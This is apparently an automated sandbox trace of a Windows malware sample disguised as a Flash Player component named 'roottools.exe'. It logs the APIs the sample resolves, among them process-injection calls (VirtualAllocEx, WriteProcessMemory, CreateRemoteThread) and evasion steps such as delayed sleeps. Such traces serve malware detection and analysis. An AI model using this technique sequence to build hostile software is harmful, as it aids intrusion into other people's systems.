Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayAllocDescriptorEx, address_out = 0x76b7ddf1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayCreateEx, address_out = 0x76bad53f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormat, address_out = 0x76bb2055 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatDateTime, address_out = 0x76bb20ea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatNumber, address_out = 0x76bb2151 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatPercent, address_out = 0x76bb21f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatCurrency, address_out = 0x76bb2288 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarWeekdayName, address_out = 0x76bb2335 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarMonthName, address_out = 0x76bb23d5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarAdd, address_out = 0x76b85934 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarAnd, address_out = 0x76b85a98 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarCat, address_out = 0x76b859b4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDiv, address_out = 0x76bde405 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarEqv, address_out = 0x76bdef07 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarIdiv, address_out = 0x76bdf00a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarImp, address_out = 0x76bdef47 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarMod, address_out = 0x76bdf15e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarMul, address_out = 0x76bddbd4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarOr, address_out = 0x76bdecfa True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarPow, address_out = 0x76bdea66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarSub, address_out = 0x76bdd332 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarXor, address_out = 0x76bdee2e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarAbs, address_out = 0x76bdca11 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFix, address_out = 0x76bdcc5f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarInt, address_out = 0x76bdcde7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarNeg, address_out = 0x76bdc802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarNot, address_out = 0x76bdec66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarRound, address_out = 0x76bdd155 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarCmp, address_out = 0x76b7b0dc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecAdd, address_out = 0x76b95f3e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecCmp, address_out = 0x76b84fd0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrCat, address_out = 0x76b80d2c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarCyMulI4, address_out = 0x76b959ed True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrCmp, address_out = 0x76b6f8b8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ole32.dll, base_address = 0x75450000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstanceEx, address_out = 0x75499d4e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromProgIDEx, address_out = 0x75460782 True 1
Fn
Module Get Filename process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 260 True 2
Fn
Module Load module_name = SXS.DLL, base_address = 0x74940000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\sxs.dll, function = SxsOleAut32MapIIDOrCLSIDToTypeLibrary, address_out = 0x74987685 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\user32.dll, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x757a7d2f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MonitorFromWindow, address_out = 0x757b3150 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MonitorFromRect, address_out = 0x757ce7a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MonitorFromPoint, address_out = 0x757b5281 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EnumDisplayMonitors, address_out = 0x757b451a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMonitorInfoA, address_out = 0x757b4413 True 1
Fn
Window Create class_name = ThunderRT6Main, wndproc_parameter = 0 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors False 1
Fn
Window Create class_name = VBMsoStdCompMgr, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = VBMsoStdCompMgr, index = 0, new_long = 5513372 False 1
Fn
Window Create class_name = VBFocusRT6, wndproc_parameter = 0 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors False 1
Fn
System Get Info type = Operating System True 1
Fn
Keyboard Get Info type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 True 1
Fn
Window Create window_name = Langskallet7, wndproc_parameter = 0 True 1
Fn
Module Load module_name = KERNEL32 , base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadProcessMemory, address_out = 0x75a1cfcc True 1
Fn
Module Load module_name = kernel32, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumResourceTypesA, address_out = 0x75a80efd True 1
Fn
Module Load module_name = shell32, base_address = 0x75c50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = Shell_NotifyIconA, address_out = 0x75e98af2 True 1
Fn
Module Load module_name = NTDLL, base_address = 0x77270000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = ZwSetInformationProcess, address_out = 0x7728fb18 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x75a010ff True 1
Fn
Module Load module_name = user32, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetDesktopWindow, address_out = 0x757b0a19 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7729e026 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x75a011a9 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x75a01b00 True 1
Fn
Module Load module_name = ntdll, base_address = 0x77270000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtYieldExecution, address_out = 0x7728ff2c True 1
Fn
System Sleep duration = 15 milliseconds (0.015 seconds) True 32
Fn
System Sleep duration = 8000 milliseconds (8.000 seconds) True 1
Fn
Module Load module_name = ntdll, base_address = 0x77270000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtProtectVirtualMemory, address_out = 0x77290028 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x75a053c6 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x75a01282 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x75a01410 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x75a03ed3 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x75a0196e True 1
Fn
Module Load module_name = kernel32, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnmapViewOfFile, address_out = 0x75a01826 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtectEx, address_out = 0x75a845bf True 1
Fn
Module Load module_name = kernel32, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLongPathNameA, address_out = 0x75a8437f True 1
Fn
Module Load module_name = kernel32, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x75a1d802 True 1
Fn
Module Load module_name = IPHlpApi, base_address = 0x74920000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\iphlpapi.dll, function = GetAdaptersInfo, address_out = 0x74929263 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x75a1d9b0 True 1
Fn
Module Load module_name = shell32, base_address = 0x75c50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteA, address_out = 0x75e97078 True 1
Fn
Module Load module_name = User32, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EnumWindows, address_out = 0x757ad1cf True 1
Fn
Module Load module_name = user32, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x757a9a55 True 1
Fn
Module Load module_name = user32, base_address = 0x75790000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EnumThreadWindows, address_out = 0x757b3961 True 1
Fn
Module Unmap process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x75a07a2f True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x75a049d7 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x75a089b3 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x772b1f6e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x75a110b5 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x75a034d5 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7729e026 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x75a035b7 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x75a1d9b0 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x75a02d3c True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x772a45f5 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x75a0dd0e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x75a014e9 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SystemTimeToFileTime, address_out = 0x75a05a7e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalMemoryStatusEx, address_out = 0x75a2d4c4 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x75a0103d True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x75a0170d True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x75a01400 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTime, address_out = 0x75a05a96 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFreeEx, address_out = 0x75a1d9c8 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsBadReadPtr, address_out = 0x75a2d075 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x75a1d5cd True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenMutexW, address_out = 0x75a05151 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEndOfFile, address_out = 0x75a1ce2e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x75a017ec True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x75a0469b True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RemoveVectoredExceptionHandler, address_out = 0x772e5f41 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75a01809 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x75a01b00 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x75a01ae5 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DuplicateHandle, address_out = 0x75a01886 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x75a01245 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = AddVectoredExceptionHandler, address_out = 0x772e742b True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x75a07a10 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x75a011f8 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x75a2830d True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x75a03e8e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x75a0195e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstChangeNotificationW, address_out = 0x75a1d851 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextChangeNotification, address_out = 0x75a25c1e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessInJob, address_out = 0x75a2c7ea True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateRemoteThread, address_out = 0x75a8416b True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateNamedPipeW, address_out = 0x75a8414b True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DisconnectNamedPipe, address_out = 0x75a841df True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ConnectNamedPipe, address_out = 0x75a840fb True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalDrives, address_out = 0x75a05371 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x75a0418b True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultUILanguage, address_out = 0x75a044ab True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x75a23b92 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x75a01b48 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x75a017d1 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x772a2c42 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x75a0465a True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x75a0192e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x75a1d4f7 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeNameForVolumeMountPointW, address_out = 0x75a1052f True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x75a01986 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileTime, address_out = 0x75a04407 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReleaseMutex, address_out = 0x75a0111e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77292270 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x75a04950 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileTime, address_out = 0x75a1ecbb True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RemoveDirectoryW, address_out = 0x75a844cf True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x75a01856 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x75a04173 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x75a01282 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x75a054ee True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x772922b0 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x75a01b18 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x75a04442 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenEventW, address_out = 0x75a015d6 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x75a1d4dc True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x75a011a9 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x75a014c9 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x75a04a2d True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteProcessMemory, address_out = 0x75a1d9e0 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSizeEx, address_out = 0x75a059e2 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x75a04435 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedExchange, address_out = 0x75a01462 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x75a1c860 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x75a03ed3 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryW, address_out = 0x75a04259 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x75a034c8 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x75a034b0 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x75a01222 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x75a0492b True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x75a28baf True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x75a2896c True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x75a011c0 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x75a2735f True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x75a03f5c True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x75a0424c True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759f0000 True 1
Fn
